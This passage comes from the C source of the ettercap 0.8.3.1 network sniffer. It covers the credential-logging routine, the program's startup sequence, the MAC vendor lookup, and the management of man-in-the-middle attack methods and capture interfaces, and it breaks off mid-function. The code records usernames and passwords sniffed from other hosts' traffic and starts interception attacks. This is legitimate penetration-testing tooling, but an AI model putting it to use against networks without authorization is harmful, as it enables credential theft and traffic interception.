password. * since they must be associated to the * server and not to the client. * so we create a new entry in the logfile */ void log_write_info(struct log_fd *fd, struct packet_object *po) { struct log_header_info hi; struct log_header_info hid; int c, zerr; memset(&hi, 0, sizeof(struct log_header_info)); memset(&hid, 0, sizeof(struct log_header_info)); /* the mac address */ memcpy(&hi.L2_addr, &po->L2.src, MEDIA_ADDR_LEN); memcpy(&hid.L2_addr, &po->L2.dst, MEDIA_ADDR_LEN); /* the ip address */ memcpy(&hi.L3_addr, &po->L3.src, sizeof(struct ip_addr)); /* the account must be associated with the server, so use dst */ memcpy(&hid.L3_addr, &po->L3.dst, sizeof(struct ip_addr)); /* the protocol */ hi.L4_proto = po->L4.proto; hid.L4_proto = po->L4.proto; /* open on the source ? */ if (is_open_port(po->L4.proto, po->L4.src, po->L4.flags)) hi.L4_addr = po->L4.src; else if (po->DISSECTOR.banner) hi.L4_addr = po->L4.src; else hi.L4_addr = 0; /* open on the dest ? */ if (is_open_port(po->L4.proto, po->L4.dst, po->L4.flags)) hid.L4_addr = po->L4.dst; else if (po->DISSECTOR.user) hid.L4_addr = po->L4.dst; else hid.L4_addr = 0; /* * resolves the ip address. * * even if the resolv option was not specified, * the cache may have the dns answer passively sniffed. */ host_iptoa(&po->L3.src, hi.hostname); host_iptoa(&po->L3.dst, hid.hostname); /* * distance in hop : * * the distance is calculated as the difference between the * predicted initial ttl number and the current ttl value. */ hi.distance = TTL_PREDICTOR(po->L3.ttl) - po->L3.ttl + 1; /* our machine is at distance 0 (special case) */ if (!ip_addr_cmp(&po->L3.src, &EC_GBL_IFACE->ip)) hi.distance = 0; /* OS identification */ memcpy(&hi.fingerprint, po->PASSIVE.fingerprint, FINGER_LEN); /* local, non local ecc ecc */ hi.type = po->PASSIVE.flags; /* calculate if the dest is local or not */ switch (ip_addr_is_local(&po->L3.dst, NULL)) { case E_SUCCESS: hid.type |= FP_HOST_LOCAL; break; case -E_NOTFOUND: hid.type |= FP_HOST_NONLOCAL; break; case -E_INVALID: hid.type = FP_UNKNOWN; break; } /* set account information */ hid.failed = po->DISSECTOR.failed; memcpy(&hid.client, &po->L3.src, sizeof(struct ip_addr)); /* set the length of the fields */ if (po->DISSECTOR.user) hid.var.user_len = htons(strlen(po->DISSECTOR.user)); if (po->DISSECTOR.pass) hid.var.pass_len = htons(strlen(po->DISSECTOR.pass)); if (po->DISSECTOR.info) hid.var.info_len = htons(strlen(po->DISSECTOR.info)); if (po->DISSECTOR.banner) hi.var.banner_len = htons(strlen(po->DISSECTOR.banner)); /* check if the packet is interesting... else return */ if (hi.L4_addr == 0 && // the port is not open !strcmp((char*)hi.fingerprint, "") && // no fingerprint hid.var.user_len == 0 && // no user and pass infos... hid.var.pass_len == 0 && hid.var.info_len == 0 && hi.var.banner_len == 0 ) { return; } LOG_LOCK; if (fd->type == LOG_COMPRESSED) { c = gzwrite(fd->cfd, &hi, sizeof(hi)); ON_ERROR(c, -1, "%s", gzerror(fd->cfd, &zerr)); /* and now write the variable fields */ if (po->DISSECTOR.banner) { c = gzwrite(fd->cfd, po->DISSECTOR.banner, strlen(po->DISSECTOR.banner) ); ON_ERROR(c, -1, "%s", gzerror(fd->cfd, &zerr)); } } else { c = write(fd->fd, &hi, sizeof(hi)); ON_ERROR(c, -1, "Can't write to logfile"); if (po->DISSECTOR.banner) { c = write(fd->fd, po->DISSECTOR.banner, strlen(po->DISSECTOR.banner) ); ON_ERROR(c, -1, "Can't write to logfile"); } } /* write hid only if there is user and pass infos */ if (hid.var.user_len == 0 && hid.var.pass_len == 0 && hid.var.info_len == 0 ) { LOG_UNLOCK; return; } if (fd->type == LOG_COMPRESSED) { c = gzwrite(fd->cfd, &hid, sizeof(hi)); ON_ERROR(c, -1, "%s", gzerror(fd->cfd, &zerr)); /* and now write the variable fields */ if (po->DISSECTOR.user) { c = gzwrite(fd->cfd, po->DISSECTOR.user, strlen(po->DISSECTOR.user) ); ON_ERROR(c, -1, "%s", gzerror(fd->cfd, &zerr)); } if (po->DISSECTOR.pass) { c = gzwrite(fd->cfd, po->DISSECTOR.pass, strlen(po->DISSECTOR.pass) ); ON_ERROR(c, -1, "%s", gzerror(fd->cfd, &zerr)); } if (po->DISSECTOR.info) { c = gzwrite(fd->cfd, po->DISSECTOR.info, strlen(po->DISSECTOR.info) ); ON_ERROR(c, -1, "%s", gzerror(fd->cfd, &zerr)); } } else { c = write(fd->fd, &hid, sizeof(hi)); ON_ERROR(c, -1, "Can't write to logfile"); if (po->DISSECTOR.user) { c = write(fd->fd, po->DISSECTOR.user, strlen(po->DISSECTOR.user) ); ON_ERROR(c, -1, "Can't write to logfile"); } if (po->DISSECTOR.pass) { c = write(fd->fd, po->DISSECTOR.pass, strlen(po->DISSECTOR.pass) ); ON_ERROR(c, -1, "Can't write to logfile"); } if (po->DISSECTOR.info) { c = write(fd->fd, po->DISSECTOR.info, strlen(po->DISSECTOR.info) ); ON_ERROR(c, -1, "Can't write to logfile"); } } LOG_UNLOCK; } /* * log hosts through ARP and ICMP discovery */ void log_write_info_arp_icmp(struct log_fd *fd, struct packet_object *po) { struct log_header_info hi; int c, zerr; memset(&hi, 0, sizeof(struct log_header_info)); /* the mac address */ memcpy(&hi.L2_addr, &po->L2.src, MEDIA_ADDR_LEN); /* the ip address */ memcpy(&hi.L3_addr, &po->L3.src, sizeof(struct ip_addr)); /* set the distance */ if (po->L3.ttl > 1) hi.distance = TTL_PREDICTOR(po->L3.ttl) - po->L3.ttl + 1; else hi.distance = po->L3.ttl; /* resolve the host */ host_iptoa(&po->L3.src, hi.hostname); /* local, non local ecc ecc */ if (po->L3.proto == htons(LL_TYPE_ARP)) { hi.type |= LOG_ARP_HOST; hi.type |= FP_HOST_LOCAL; } else { hi.type = po->PASSIVE.flags; } LOG_LOCK; if (fd->type == LOG_COMPRESSED) { c = gzwrite(fd->cfd, &hi, sizeof(hi)); ON_ERROR(c, -1, "%s", gzerror(fd->cfd, &zerr)); } else { c = write(fd->fd, &hi, sizeof(hi)); ON_ERROR(c, -1, "Can't write to logfile"); } LOG_UNLOCK; } /* * open/close the file to store all the USER_MSG */ int set_msg_loglevel(int level, char *filename) { switch (level) { case LOG_TRUE: /* close the filedesc if already opened */ set_msg_loglevel(LOG_FALSE, filename); EC_GBL_OPTIONS->msg_fd = fopen(filename, FOPEN_WRITE_TEXT); if (EC_GBL_OPTIONS->msg_fd == NULL) FATAL_MSG("Cannot open \"%s\" for writing", filename); break; case LOG_FALSE: /* close the file and set the pointer to NULL */ if (EC_GBL_OPTIONS->msg_fd) { fclose(EC_GBL_OPTIONS->msg_fd); EC_GBL_OPTIONS->msg_fd = NULL; } break; } return E_SUCCESS; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_main.c000664 000000 000000 00000013444 13711276346 016016 0ustar00rootroot000000 000000 /* ettercap -- everything starts from this file... Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef HAVE_EC_LUA #include #endif /* global vars */ /* protos */ /*******************************************/ int main(int argc, char *argv[]) { /* * Alloc the global structures * We can access these structs via the macro in ec_globals.h */ libettercap_init(PROGRAM, EC_VERSION); libettercap_load_conf(); DEBUG_MSG("main -- here we go !!"); /* initialize the filter mutex */ filter_init_mutex(); /* register the main thread as "init" */ ec_thread_register(ec_thread_getpid(NULL), "init", "initialization phase"); /* activate the signal handler */ signal_handler(); #ifdef OS_GNU fprintf(stdout,"%s is still not fully supported in this OS because of missing live capture support.", EC_GBL_PROGRAM); #endif /* ettercap copyright */ fprintf(stdout, "\n" EC_COLOR_BOLD "%s %s" EC_COLOR_END " copyright %s %s\n\n", EC_GBL_PROGRAM, EC_GBL_VERSION, EC_COPYRIGHT, EC_AUTHORS); /* getopt related parsing... */ parse_options(argc, argv); /* * get the list of available interfaces * * this function will not return if the -I option was * specified on command line. it will instead print the * list and exit */ capture_getifs(); /* initialize the user interface */ libettercap_ui_init(); /* initialize the network subsystem */ network_init(); #ifdef HAVE_GEOIP /* initialize the GeoIP API */ if (EC_GBL_CONF->geoip_support_enable) geoip_init(); #endif /* * always disable the kernel ip forwarding (except when reading from file). * the forwarding will be done by ettercap. */ if(!EC_GBL_OPTIONS->read && !EC_GBL_OPTIONS->unoffensive && !EC_GBL_OPTIONS->only_mitm) { #ifdef WITH_IPV6 /* * disable_ipv6_forward() registers the restore function with atexit() * which relies on the regain_privs_atexit() registered in * disable_ip_forward() below. * So the call of disable_ipv6_forward() must NOT be after the call of * disable_ip_forward(). */ disable_ipv6_forward(); #endif disable_ip_forward(); #ifdef OS_LINUX if (!EC_GBL_OPTIONS->read) disable_interface_offload(); #endif /* binds ports and set redirect for ssl wrapper */ if(EC_GBL_SNIFF->type == SM_UNIFIED && EC_GBL_OPTIONS->ssl_mitm) ssl_wrap_init(); #if defined OS_LINUX && defined WITH_IPV6 /* check if privacy extensions are enabled */ check_tempaddr(EC_GBL_OPTIONS->iface); #endif } /* * drop root privileges * we have already opened the sockets with high privileges * we don't need anymore root privs. */ drop_privs(); /***** !! NO PRIVS AFTER THIS POINT !! *****/ /* load all the plugins */ plugin_load_all(); /* print how many dissectors were loaded */ conf_dissectors(); /* load the mac-fingerprints */ manuf_init(); /* load the tcp-fingerprints */ fingerprint_init(); /* load the services names */ services_init(); /* load http known fileds for user/pass */ http_fields_init(); #ifdef HAVE_EC_LUA /* Initialize lua */ ec_lua_init(); #endif /* set the encoding for the UTF-8 visualization */ set_utf8_encoding((u_char*)EC_GBL_CONF->utf8_encoding); /* print all the buffered messages */ if (EC_GBL_UI->type == UI_TEXT) USER_MSG("\n"); ui_msg_flush(MSG_ALL); /**** INITIALIZATION PHASE TERMINATED ****/ /* * we are interested only in the mitm attack i * if entered, this function will not return... */ if (EC_GBL_OPTIONS->only_mitm) only_mitm(); /* create the dispatcher thread */ ec_thread_new("top_half", "dispatching module", &top_half, NULL); /* this thread becomes the UI then displays it */ ec_thread_register(ec_thread_getpid(NULL), EC_GBL_PROGRAM, "the user interface"); /* start unified sniffing for curses and GTK at startup */ if ((EC_GBL_UI->type == UI_CURSES || EC_GBL_UI->type == UI_GTK) && EC_GBL_CONF->sniffing_at_startup) EXECUTE(EC_GBL_SNIFF->start); /* start the actual user interface */ libettercap_ui_start(); /******************************************** * reached only when the UI is shutted down ********************************************/ /* Call all the proper stop methods to ensure * that no matter what UI was selected, everything is * turned off gracefully */ clean_exit(0); return 0; //Never reaches here } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_manuf.c000664 000000 000000 00000011254 13711276346 016175 0ustar00rootroot000000 000000 /* ettercap -- manufacturer finterprint module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ /* * MFDBL: mac fingerprint database library. * * Copyright (c) 2002 Bonelli Nicola * * All rights reserved. * * Linux needs queue macros from /usr/include/sys/queue.h (BSD) * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. 2. * Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND ANY * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * */ #include #include #include #define TABBIT 10 /* 2^10 bit tab entries: 1024 SLISTS */ #define TABSIZE (1UL<mac = (h); \ (p)->vendor = strdup (v); \ } while (0) /* globals */ static SLIST_HEAD(, entry) manuf_head[TABSIZE]; struct entry { unsigned int mac; char *vendor; SLIST_ENTRY(entry) entries; }; /* protos */ static void discard_macdb(void); int manuf_init(void); char * manuf_search(const char *m); /*****************************************/ static void discard_macdb(void) { struct entry *l; u_int i; for (i = 0; i < TABSIZE; i++) { while (SLIST_FIRST(&manuf_head[i]) != NULL) { l = SLIST_FIRST(&manuf_head[i]); SLIST_REMOVE_HEAD(&manuf_head[i], entries); SAFE_FREE(l->vendor); SAFE_FREE(l); } } DEBUG_MSG("ATEXIT: discard_macdb"); return; } int manuf_init(void) { struct entry *p; char line[6+1+120+1]; // MAC + Blank + Description + Newline char name[120+1]; union { char b[4]; u_int32 i; } mac; FILE *f; int m1, m2, m3, i; i = 0; f = open_data("share", MAC_FINGERPRINTS, FOPEN_READ_TEXT); ON_ERROR(f, NULL, "Cannot open %s", MAC_FINGERPRINTS); while (fgets(line, 127, f) != 0) { if (sscanf(line, "%02X%02X%02X %120[^,\n],\n", &m1, &m2, &m3, name) != 4) continue; mac.b[0] = (char) (m1); mac.b[1] = (char) (m2); mac.b[2] = (char) (m3); mac.b[3] = 0; LOAD_ENTRY(p, mac.i, name); SLIST_INSERT_HEAD(&(manuf_head[fnv_32(mac.b, 4) & TABMASK]), p, entries); i++; } DEBUG_MSG("manuf_init -- %d fingers loaded", i); USER_MSG("%4d mac vendor fingerprint\n", i); fclose(f); atexit(discard_macdb); return i; } char * manuf_search(const char *m) { struct entry *l; union { char b[4]; u_int32 i; } mac; u_int32 h; mac.b[0] = *m++; mac.b[1] = *m++; mac.b[2] = *m; mac.b[3] = 0; h = fnv_32(mac.b, 4) & TABMASK; SLIST_FOREACH(l, &manuf_head[h], entries) { if (l->mac == mac.i) return (l->vendor); } return ""; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_mem.c000664 000000 000000 00000002107 13711276346 015642 0ustar00rootroot000000 000000 /* ettercap -- global variables handling module Copyright (C) Ettercap Development Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include void safe_free_mem(char **param, int *param_length, char *command) { int k; SAFE_FREE(command); for(k= 0; k < (*param_length); ++k) SAFE_FREE(param[k]); SAFE_FREE(param); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_mitm.c000664 000000 000000 00000011401 13711276346 016027 0ustar00rootroot000000 000000 /* ettercap -- mitm management module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /* globals */ static SLIST_HEAD (, mitm_entry) mitm_table; struct mitm_entry { int selected; int started; struct mitm_method *mm; SLIST_ENTRY (mitm_entry) next; }; static char *mitm_args = ""; /*******************************************/ /* * register a new mitm method in the table */ void mitm_add(struct mitm_method *mm) { struct mitm_entry *e; SAFE_CALLOC(e, 1, sizeof(struct mitm_entry)); /* copy the mm struct */ SAFE_CALLOC(e->mm, 1, sizeof(struct mitm_method)); memcpy(e->mm, mm, sizeof(struct mitm_method)); SLIST_INSERT_HEAD(&mitm_table, e, next); } /* * set the 'selected' flag in the table * used by ec_parse.c */ int mitm_set(char *name) { struct mitm_entry *e; if ((mitm_args = strchr(name, ':')) != NULL) { *mitm_args = '\0'; mitm_args ++; } else { mitm_args = ""; } DEBUG_MSG("mitm_set: %s (%s)", name, mitm_args); /* search the name and set it */ SLIST_FOREACH(e, &mitm_table, next) { if (!strcasecmp(e->mm->name, name)) { e->selected = 1; return E_SUCCESS; } } return -E_NOTFOUND; } /* * return 1 if the mitm method is active */ int is_mitm_active(char *name) { struct mitm_entry *e; /* search the name and set it */ SLIST_FOREACH(e, &mitm_table, next) if (!strcasecmp(e->mm->name, name)) return e->started; return 0; } /* * starts all the method with the selected flag set. * it is possible to start multiple method simultaneusly */ int mitm_start(void) { struct mitm_entry *e; /* reading from file we won't start mitm */ if (EC_GBL_OPTIONS->read || EC_GBL_OPTIONS->unoffensive) { DEBUG_MSG("mitm_start: skipping"); return -E_INVALID; } DEBUG_MSG("mitm_start"); /* start all the selected methods */ SLIST_FOREACH(e, &mitm_table, next) { if (e->selected && !e->started) { /* cant use -R with mitm methods */ if (EC_GBL_OPTIONS->reversed) SEMIFATAL_ERROR("Reverse target matching can't be used with MITM attacks"); if (!EC_GBL_IFACE->is_ready) SEMIFATAL_ERROR("MITM attacks can't be used on unconfigured interfaces"); DEBUG_MSG("mitm_start: starting %s", e->mm->name); /* * if the mitm method does not start correctly, * deselect it ! */ if (e->mm->start(mitm_args) == E_SUCCESS) e->started = 1; else e->selected = 0; } } return E_SUCCESS; } /* * stop all the previously started method */ void mitm_stop(void) { struct mitm_entry *e; DEBUG_MSG("mitm_stop"); /* stop all the started methods */ SLIST_FOREACH(e, &mitm_table, next) { if (e->started) { DEBUG_MSG("mitm_stop: stopping %s", e->mm->name); e->mm->stop(); e->started = 0; e->selected = 0; } } } /* * keep the process running until the user exits */ void only_mitm(void) { char ch = 0; /* build the list of active hosts */ build_hosts_list(); /* start the mitm attack */ mitm_start(); INSTANT_USER_MSG("Activated the mitm attack only... (press 'q' to exit)\n"); if (EC_GBL_UI->type == UI_DAEMONIZE) LOOP { ec_usleep(SEC2MICRO(1)); } /* wait for user to exit */ while (ch != 'q' && ch != 'Q') { /* if there is a pending char to be read */ if ( ec_poll_in(fileno(stdin), 1) || ec_poll_buffer(EC_GBL_OPTIONS->script) ) { /* get the input from the stdin or the buffer */ if (ec_poll_buffer(EC_GBL_OPTIONS->script)) ch = getchar_buffer(&EC_GBL_OPTIONS->script); else ch = getchar(); } } INSTANT_USER_MSG("Exiting...\n\n"); /* stop the process */ mitm_stop(); /* perform a clean exit */ clean_exit(0); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_network.c000664 000000 000000 00000032531 13711276346 016561 0ustar00rootroot000000 000000 #include #include #include #include #include #include #include #include #if !defined(OS_WINDOWS) #include #endif #if defined(OS_BSD_OPEN) /* OPENBSD needs 0 */ #define PCAP_TIMEOUT 0 #elif defined(OS_SOLARIS) /* SOLARIS needs > 1 */ #define PCAP_TIMEOUT 10 #else /* LINUX needs > 0 */ /* FREEBSD needs 1 */ /* MACOSX needs 1 */ #define PCAP_TIMEOUT 1 #endif struct source_entry { struct iface_env iface; LIST_ENTRY(source_entry) next; }; /* globals */ static LIST_HEAD(,source_entry) sources_list; static pthread_mutex_t sl_mutex = PTHREAD_MUTEX_INITIALIZER; #define SOURCES_LIST_LOCK do{ pthread_mutex_lock(&sl_mutex); }while(0) #define SOURCES_LIST_UNLOCK do{ pthread_mutex_unlock(&sl_mutex); }while(0) /* protos */ static void close_network(); static void pcap_winit(pcap_t *pcap); static void source_print(struct iface_env *source); static int source_init(char *name, struct iface_env *source, bool primary, bool live); static void source_close(struct iface_env *iface); static int secondary_sources_init(char **sources); static void close_secondary_sources(void); static void l3_init(void); static void l3_close(void); /* the code */ void network_init() { char *iface; DEBUG_MSG("init_network"); EC_GBL_PCAP->snaplen = UINT16_MAX; if(EC_GBL_OPTIONS->read) { source_init(EC_GBL_OPTIONS->pcapfile_in, EC_GBL_IFACE, true, false); source_print(EC_GBL_IFACE); } else { iface = EC_GBL_OPTIONS->iface ? EC_GBL_OPTIONS->iface : (EC_GBL_OPTIONS->iface = capture_default_if()); ON_ERROR(iface, NULL, "No suitable interface found..."); source_init(iface, EC_GBL_IFACE, true, true); source_print(EC_GBL_IFACE); if(EC_GBL_SNIFF->type == SM_BRIDGED) { source_init(EC_GBL_OPTIONS->iface_bridge, EC_GBL_BRIDGE, true, true); source_print(EC_GBL_BRIDGE); if(EC_GBL_BRIDGE->dlt != EC_GBL_IFACE->dlt) FATAL_ERROR("Can't bridge interfaces of different types"); } } if(get_decoder(LINK_LAYER, EC_GBL_IFACE->dlt) == NULL) { if(EC_GBL_OPTIONS->read) FATAL_ERROR("Dump file not supported (%s)", pcap_datalink_val_to_description(EC_GBL_PCAP->dlt)); else FATAL_ERROR("Interface \"%s\" not supported (%s)", EC_GBL_OPTIONS->iface, pcap_datalink_val_to_description(EC_GBL_PCAP->dlt)); } if(EC_GBL_OPTIONS->write) pcap_winit(EC_GBL_IFACE->pcap); /* determine alignment margin and allocate packet buffer per interface */ EC_GBL_PCAP->align = get_alignment(EC_GBL_PCAP->dlt); SAFE_CALLOC(EC_GBL_IFACE->pbuf, UINT16_MAX + EC_GBL_PCAP->align + 256, sizeof(char)); if (!EC_GBL_OPTIONS->read && EC_GBL_SNIFF->type == SM_BRIDGED) SAFE_CALLOC(EC_GBL_BRIDGE->pbuf, UINT16_MAX + EC_GBL_PCAP->align + 256, sizeof(char)); if(EC_GBL_OPTIONS->secondary) { secondary_sources_init(EC_GBL_OPTIONS->secondary); atexit(close_secondary_sources); } /* Layer 3 handlers initialization */ if(!EC_GBL_OPTIONS->unoffensive) l3_init(); atexit(close_network); } static void close_network() { pcap_close(EC_GBL_IFACE->pcap); SAFE_FREE(EC_GBL_IFACE->pbuf); if(EC_GBL_SNIFF->type == SM_BRIDGED) { pcap_close(EC_GBL_BRIDGE->pcap); SAFE_FREE(EC_GBL_BRIDGE->pbuf); } if(EC_GBL_OPTIONS->write) pcap_dump_close(EC_GBL_PCAP->dump); libnet_destroy(EC_GBL_IFACE->lnet); libnet_destroy(EC_GBL_BRIDGE->lnet); DEBUG_MSG("ATEXIT: close_network"); } static void pcap_winit(pcap_t *pcap) { pcap_dumper_t *pdump; pdump = pcap_dump_open(pcap, EC_GBL_OPTIONS->pcapfile_out); ON_ERROR(pdump, NULL, "pcap_dump_open: %s", pcap_geterr(pcap)); EC_GBL_PCAP->dump = pdump; } static void source_print(struct iface_env *source) { char strbuf[256]; struct net_list *ip6; if(source->is_live) { USER_MSG("Listening on:\n"); USER_MSG("%6s -> %s\n", source->name, mac_addr_ntoa(source->mac, strbuf)); if(source->has_ipv4) { USER_MSG("\t %s/", ip_addr_ntoa(&source->ip, strbuf)); USER_MSG("%s\n", ip_addr_ntoa(&source->netmask, strbuf)); } if(source->has_ipv6) { LIST_FOREACH(ip6, &source->ip6_list, next) { USER_MSG("\t %s/%d\n", ip_addr_ntoa(&ip6->ip, strbuf), ip6->prefix); } USER_MSG("\n"); } else { USER_MSG("\n\n"); } } else { USER_MSG("Reading from %s\n", source->name); } } static int source_init(char *name, struct iface_env *source, bool primary, bool live) { int ret; pcap_t *pcap = NULL; libnet_t *lnet = NULL; struct bpf_program bpf; char pcap_errbuf[PCAP_ERRBUF_SIZE]; char lnet_errbuf[LIBNET_ERRBUF_SIZE]; int snaplen; struct libnet_ether_addr *mac; struct sockaddr_in *sa4; struct sockaddr_in6 *sa6; struct net_list *ip6; #if !defined(OS_WINDOWS) struct ifaddrs *ifaddrs, *ifaddr; #endif DEBUG_MSG("source_init %s", name); BUG_IF(source == NULL); /* ===pcap initialization=== */ if(live) { pcap = pcap_open_live(name, EC_GBL_PCAP->snaplen, EC_GBL_PCAP->promisc, PCAP_TIMEOUT, pcap_errbuf); if(pcap == NULL) { if(primary) ON_ERROR(pcap, NULL, "pcap_open_live: %s", pcap_errbuf); else return -E_INITFAIL; } } else { /* secondary sources must not be offline */ if(!primary) return -E_NOTHANDLED; struct stat st; int stat_result; FILE* pcap_file_h; pcap = pcap_open_offline(name, pcap_errbuf); ON_ERROR(pcap, NULL, "pcap_open_offline: %s", pcap_errbuf); pcap_file_h = pcap_file(pcap); ON_ERROR(pcap_file_h, 0, "pcap_fileno returned an invalid file handle"); stat_result = fstat(fileno(pcap_file_h), &st); ON_ERROR(stat_result, -1, "fstat failed."); EC_GBL_PCAP->dump_size = st.st_size; } source->dlt = pcap_datalink(pcap); if(primary) EC_GBL_PCAP->dlt = source->dlt; if(source->dlt == DLT_IEEE802_11) { DEBUG_MSG("Wireless monitor mode used, switching to unoffensive mode"); source->unoffensive = 1; if(primary) EC_GBL_OPTIONS->unoffensive = 1; } if(!strcmp(name, "lo")) { DEBUG_MSG("Loopback interface used, switching to unoffensive mode"); source->unoffensive = 1; if(primary) EC_GBL_OPTIONS->unoffensive = 1; } if(EC_GBL_PCAP->filter && strcmp(EC_GBL_PCAP->filter, "") && live) { u_int net, mask; if(pcap_lookupnet(name, &net, &mask, pcap_errbuf) == -1) ERROR_MSG("%s - %s", name, pcap_errbuf); if(pcap_compile(pcap, &bpf, EC_GBL_PCAP->filter, 1, mask) < 0) ERROR_MSG("Wrong pcap filter: %s - %s", name, pcap_geterr(pcap)); if(pcap_setfilter(pcap, &bpf) == 1) ERROR_MSG("Cannot set pcap filter: %s - %s", name, pcap_geterr(pcap)); } snaplen = pcap_snapshot(pcap); DEBUG_MSG("requested snaplen for %s: %d, assigned snaplen: %d", name, EC_GBL_PCAP->snaplen, snaplen); if(primary) EC_GBL_PCAP->snaplen = snaplen; source->pcap = pcap; SAFE_STRDUP(source->name, name); if(live) { source->is_live = 1; } else { source->is_ready = 1; return E_SUCCESS; } if(!EC_GBL_OPTIONS->unoffensive && !source->unoffensive) { lnet = libnet_init(LIBNET_LINK_ADV, name, lnet_errbuf); ON_ERROR(lnet, NULL, "libnet_init: %s", lnet_errbuf); mac = libnet_get_hwaddr(lnet); memcpy(&source->mac, mac, MEDIA_ADDR_LEN); } source->lnet = lnet; source->mtu = get_iface_mtu(name); #if defined(OS_WINDOWS) pcap_if_t *dev; for (dev = (pcap_if_t *)EC_GBL_PCAP->ifs; dev; dev = dev->next) { if(strcmp(dev->name, name)) continue; if(dev->addresses->addr->sa_family == AF_INET) { sa4 = (struct sockaddr_in*) dev->addresses->addr; ip_addr_init(&source->ip, AF_INET, (u_char*)&sa4->sin_addr); if(EC_GBL_OPTIONS->netmask) { if(ip_addr_pton(EC_GBL_OPTIONS->netmask, &source->netmask) != E_SUCCESS) FATAL_ERROR("Invalid netmask %s", EC_GBL_OPTIONS->netmask); } else { sa4 = (struct sockaddr_in*) dev->addresses->netmask; ip_addr_init(&source->netmask, AF_INET, (u_char*)&sa4->sin_addr); } ip_addr_get_network(&source->ip, &source->netmask, &source->network); source->has_ipv4 = 1; } else if(dev->addresses->addr->sa_family == AF_INET6) { SAFE_CALLOC(ip6, 1, sizeof(*ip6)); sa6 = (struct sockaddr_in6*) dev->addresses->addr; ip_addr_init(&ip6->ip, AF_INET6, (u_char*)&sa6->sin6_addr); sa6 = (struct sockaddr_in6*) dev->addresses->netmask; ip_addr_init(&ip6->netmask, AF_INET6, (u_char*)&sa6->sin6_addr); ip_addr_get_network(&ip6->ip, &ip6->netmask, &ip6->network); ip6->prefix = ip_addr_get_prefix(&ip6->netmask); LIST_INSERT_HEAD(&source->ip6_list, ip6, next); source->has_ipv6 = 1; } } #else ret = getifaddrs(&ifaddrs); ON_ERROR(ret, -1, "getifaddrs: %s", strerror(errno)); for(ifaddr = ifaddrs; ifaddr; ifaddr = ifaddr->ifa_next) { if (ifaddr->ifa_addr == NULL) continue; if(strcmp(ifaddr->ifa_name, name)) continue; if(ifaddr->ifa_addr->sa_family == AF_INET) { sa4 = (struct sockaddr_in*)ifaddr->ifa_addr; ip_addr_init(&source->ip, AF_INET, (u_char*)&sa4->sin_addr); if(EC_GBL_OPTIONS->netmask) { if(ip_addr_pton(EC_GBL_OPTIONS->netmask, &source->netmask) != E_SUCCESS) FATAL_ERROR("Invalid netmask %s", EC_GBL_OPTIONS->netmask); } else { sa4 = (struct sockaddr_in*)ifaddr->ifa_netmask; ip_addr_init(&source->netmask, AF_INET, (u_char*)&sa4->sin_addr); } ip_addr_get_network(&source->ip, &source->netmask, &source->network); source->has_ipv4 = 1; } else if(ifaddr->ifa_addr->sa_family == AF_INET6) { SAFE_CALLOC(ip6, 1, sizeof(*ip6)); sa6 = (struct sockaddr_in6*)ifaddr->ifa_addr; 